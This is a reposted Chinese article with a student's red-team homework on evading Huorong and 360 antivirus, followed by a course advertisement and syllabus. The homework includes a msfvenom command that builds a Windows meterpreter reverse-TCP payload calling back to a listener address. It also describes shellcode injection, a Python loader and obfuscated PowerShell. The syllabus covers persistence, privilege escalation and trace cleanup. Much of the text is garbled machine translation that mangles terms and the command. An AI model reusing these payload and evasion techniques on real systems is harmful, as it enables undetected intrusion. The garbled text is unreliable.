防火墙 火绒,常见的防火墙系统

　　文章来源MS08067 红队培训班第12节课作业

　　作者：汤浩荡(红队训练一班)

　　按老师要求尝试完成布置的作业如下：环境准备：

　　Kali linux安装cs4.2，Windows7系统安装tinder杀毒和360杀毒。为了避免查杀，防止网络查杀，关闭网络连接。

　　一.Shellcode远程线程注入1.MSF生成C特洛伊木马

　　msfvenom - list编码器

　　//检查编码模块。经过测试，x86和x64都不能用，会导致无法上线。

　　MSF venom-p Windows/Meter Preter/Reverse _ TCP LHost=172 . 16 . 12 . 145 port=4444-ECMD/PowerShell _ Base64-i5-fC-O2 . c//-E指定编码方式，-i指定编码次数，-F指定生成的文件类型。

　　2.复制外壳代码内容，并注入。用loader中的远程线程生成免杀处理代码gedit1.c。

　　//用C语言编辑生成的木马，复制外壳代码。

　　使用vs2019构建项目，并生成源代码。cpp(内容是远程线程注入。c)，替换shellcode，用mt多线程替换编译运行时。

　　3.对生成的免杀代码进行免杀测试，结果如下：

　　传而不杀！

　　二.python加载器这种免删除方法继续使用以前生成的外壳代码，并使用记事本替换双引号，\x和\r\n

　　然后替换加载程序中的外壳代码部分，如下图所示：

　　使用pyinstaller将py文件生成为exe文件。

　　复制exe文件，用tinder和360进行免杀测试。结果如下：

　　这种方法没能杀死火绒。

　　三.无文件落地免杀技术cs生成powershell联机命令

　　复制powershell代码，把hex和ladon7.0混淆。

　　复制双引号内的混淆代码，转到key.ps1进行免杀测试。

　　天鹅绒无杀伤失败

　　-四.掩日免杀框架直接运行3.1.2.exe软件。如果需要gcc运行环境，直接从github下载。安装环境的时候注意去掉。

　　方法很简单，把文件拖到运行窗口就行了。目前cs代码只支持C格式的免杀和免杀测试，如下：

　　天鹅绒没能杀人。

　　总结：目前仅shellcode远程注入方式生成的exe通过了360和火绒的免杀，golang加载器、dll load shellcode暂不进行尝试，进行作业后实验，三件套已经做过实验，效果太差，不进行详细过程编写。

　　10.1号 红队攻防 第3期 预招

　　课程费用

　　第三届价格为2699，8月底前报名享受早鸟价：2399(前40名学生可获得内网知识星球名额499元)，每名报名学生均可享受免费听课权。如果他一次听不懂，可以再来一次，后续的任何培训课他都可以听。有兴趣参加培训的同学赶紧报名吧！

　　学习资源

　　报名前40名的同学将获得内网知识星球499元。他们可以提前了解内部网渗透情况，并提供课程中需要的相关软件和环境。

　　上课时间

　　每周五、六、日的晚间 19：00-21:00 ，共21课时，为期一个半月。如果不能按时参加直播课程，在线培训的每一门课程都会被录制成视频上传到学生区，可以随时下载观看。

　　上课方式

　　培训采用微信群答案在线直播录制的形式，不用等。注册后立即可以进入“内网星球”开始预览。

　　讲师介绍

　　讲师：A:MS08067安全实验室核心成员，原某国企安全研究员，擅长APT攻击和社会工程。

　　讲师：B:MS08067安全实验室核心成员，主要从事渗透测试和安全开发的研究。参加过多次全国护网行动，有多年红队经验。

　　全新课程大纲

　　全新课程目录

　　第1课信息收集的一般概念

　　被动信息收集

　　信息收集的一般概念及其在整个红队过程中的地位；

　　被动信息收集的基本结构和逻辑；

　　被动信息收集的常用手段(网络空间搜索、被动信息收集工具、传统搜索)；

　　被动信息收集后的信息处理；

　　被动信息收集工具的基本原理以及如何编写它们；第2天主动收集信息

　　信息收集后的综合信息处理。

　　主动信息收集的基本结构和逻辑；

　　主动信息收集的常用手段(仅扫描nmap和扫描goby)；带POC)；

　　主动收集信息后的信息处理；

　　主动信息收集工具的基本原理以及如何编写它们；

　　如何综合处理主动信息采集和被动信息采集的信息；

　　如何将收集到的信息链接到下一个红队流程；

　　第三天社会工程

　　社会工程的含义和实际应用；

　　社会工程知识体系；

　　社会工程的学习方法；

　　第4天社会工程中的信息收集

　　利用社会工程收集组织目标和个人目标信息的差异及实际应用：

　　社会工程收集信息的常用方法；

　　第5课社会工程中的信息处理和识别(信息分析)互动

　　社会工程中常见的钓鱼方法及应用；

　　在社会工程中，如何根据收集到的信息，利用目标的社会属性弱点进行交互；

　　社会工程中获取和利用信任的方法

　　【信息收集和社会工程是红队进攻的重点，必须掌握。实战干货很多。前5天请不要迟到]

　　第6天免除杀人文件

　　免杀中使用的编程语言及相关知识库

　　程序的基本结构；

　　c .免于杀戮的依据；

　　python中使用的基础kill-free；

　　Win32api基金会；

　　c写最基本的socket；

　　用python写最基础的socket；第7课免除杀人文件

　　免杀中使用的编程语言及相关知识库

　　有效载荷的基本结构和编程语言的实际应用；

　　有效载荷的基本结构(以MSFf和CS为例)；

　　c2的基本原理；

　　c用来写最基本的shellcode loader

　　用python写最基本的shellcode loader第8天免除杀人文件

　　杀毒软件的基本原理和绕过它的方法。

　　根据tinder静态分析的特点，分析并绕过思维；

　　windowsdefender的shellcode特征码特征分析及规避方法；

　　360动态分析的特点及绕过方法分析：

　　手动分析的旁路和处理；第9课Windows权限维护

　　Windows权限维护概述及隐藏技巧：关闭软杀；

　　自启动注册表；剧本；

　　计划任务；自启动服务；

　　记忆码；进程劫持；隐蔽隧道；第10天Liunx权限维护

　　Liunx权限维护概述及隐藏技巧：

　　添加用户；SUIDshell

　　SSH公钥和私钥；软连接；

　　Crontab计划任务；Strace后门Openssh后门；

　　隐蔽隧道；记忆码；第11天：提高Windows Intranet的能力

　　土豆家族提出权力；补丁权限；系统配置错误提升权限；

　　第三方服务权利；集团政策。Bypassuac

　　数据库权限；代币盗窃；收集密码，索要权利；

　　第12天Liunx内部网功率提升

　　系统内核提升能力；第三方服务权利；

　　数据库权限；收集密码，索要权利；

　　键盘记录以提高权利；Suid右边；

　　须藤提高权力；壳牌的反弹和增权；第13天内部网渗透

　　内部网渗透、正向代理和反向代理概述；

　　花生壳网络渗透；玻璃钢网络渗透；

　　Ngrok内部网渗透率；reGeorg Proxifier

　　向日葵代理和teamviewer；

　　最小化渗透概述；云功能；畴前；第14天：域内信息收集和域信任

　　域内信息收集概述；

　　域内用户组集合；域信任关系的集合；

　　用户目录集合；预控制日志收集；

　　Arp信息收集；TcpdumpSshkey集合；

　　明配置阅读；网络拓扑分析和判断；第15天领域渗透工具的实际使用

　　SetspnNslookupAdFind

　　Psloggendon360safebrowserdecrypt

　　SchtaskBackDoorWebshellregeditBypassUAC第16课票据伪造和域委托攻击

　　PTH认证过程分析：票据伪造攻击原理

　　Mimikatz实现票据伪造攻击；

　　领域委托原则；域委托攻击方法；第17课森林渗透

　　森林渗透概述及父域、子域、域间信任关系分析；大规模领域渗透思想；

　　预控定位；Pth注射；域信任攻击；

　　组策略漏洞；和网络系统漏洞；逃脱漏洞；

　　第18天免杀Mimikatz和bypassUAC

　　Mimikatz入门与实战；Mimikatz 18种避免杀戮的方法；

　　UAC工作原理介绍；ICMLuaUtil bypassUAC；第19天痕迹清理

　　Windows操作系统的痕迹清理

　　窗户痕迹清理的基本思路和思维逻辑：

　　Windows清理操作痕迹；

　　窗户清洁时间痕迹第20课痕迹清洁

　　Linux操作系统的痕迹清理

　　Linux痕迹清理的基本思想和思维逻辑；

　　清理Linux的登录痕迹；

　　清理Linux操作痕迹；

　　Lnux清理时间跟踪；

　　第21课

　　根据国内环境下云服务商的制作环境，将该班学生分为AB队。每个团队都有一个目标。为了模拟真实环境，将采用两家不同的云服务提供商(不透露具体厂商)。每个环境会开放不同的公共服务(服务的类型和数量都不一样，以避免通过模拟本地环境来攻击对方)。讲师将模拟普通用户使用两个团队的环境。攻击前我会私聊AB两队队长的登录环境，队长也会私聊我全单车的攻击平面的公开ip，以此来鉴定是否犯规，并在实战开始时向对方公布环境地址。*大纲仅供参考，会根据目前进度变化。

　　毕业实战

　　为了顺利完成课程的相关内容，学生必须提前预习相关知识点。已经报名的请购买实验室制作的书籍《内网安全攻防：渗透测试实战指南》或在赠送的MS08067实验室如何提前预习中学习相关内容。

　　“内网知识星球”书籍之间的关系

　　055-79000是国内第一本关于内网安全的书，2018年出版，深受校长爱好者的喜爱。这本书被定位为内部网安全的介绍，所以许多先进的技术没有包括在内。而且由于出书的特殊性，很多实际干货和想法都无法完整呈现。这本书到现在已经出版三年了，这期间出现了很多新技术。

　　本质上，红队的这次攻防训练和这本书没有任何关系。那本书讲的是内网，现场训练内容是红队的进攻。但如果非要有关联，也可以理解为书本技术的延伸；是本书的进阶版，实用版，干货版。

　　 直播培训内容和 《内网渗透测试实战指南》

　　首先从内容上看，内网知识星球的定位是《内网安全攻防：渗透测试实战指南》配套技术的视频讲解。直播训练内容是一个全新的课程体系，本质上是不一样的。

　　从形式上看，知识星球是一种类似论坛的形式，更有利于圈子的交流。我们提供的视频教程需要你下载，观看，练习，才能学会。买了之后不下载，下载之后不看，看了之后不练，还是没用。现场培训的目标是让你学习，而不只是给你一堆视频教程看。我们会布置作业，批改作业，有个别答案，这也是我们设置每学期学生人数的原因。

　　我们非常珍惜读者对MS08067的信任。我们希望能做小而精的高质量在线培训。如果我们宣传它，把它做大，它就会变质。在这里，每个注册学生都可以享受免费重听的权利。如果一次没看懂，可以再来。如果你在实际工作中遇到问题，可以带着你的问题再听一遍。

　　直播培训和内网知识星球的区别

　　MS08067这几年在安全领域的口碑有目共睹。尤其是对校长感兴趣的学生和爱好者，做了一些有意义的事情。他们对读者是真诚的，一点虚假都没有。做星球的初衷是满足读者对书籍配套视频的需求。不像有些培训是以宣传和“卖教程”为主，我们的初心和技术能力从实验室四年出版四本原著就能看出来。

　　本次训练以红队进攻实战应用为主，注重实战、干货、思路、深度。负责讲解的老师也是MS08067的资深核心成员，有着多年的实际工作经验，让你学到的技术能够真正用在企业中。

　　很多读者告诉我，他们是从看视频和看书自学开始的，但是一旦遇到实验中的错误，就无法解决。没人回答他们不懂的技术点，也没掌握本该重点关注的技术。100%的初学者或多或少都会走一些弯路。学了1-2年，还是效率低，进步慢，有的甚至放弃了新安的贸易。学习新安需要圈子和方法，自学当然没问题。

　　最后说一下现在的校长培训。有很多人

　　详情请联系客服。

　　 为什么选择MS08067直播培训

　　 你距离红队大佬，只差一个决定

　　扫描下方二维码加入星球学习

郑重声明：本文由网友发布，不代表盛行IT的观点，版权归原作者所有，仅为传播更多信息之目的，如有侵权请联系，我们将第一时间修改或删除，多谢。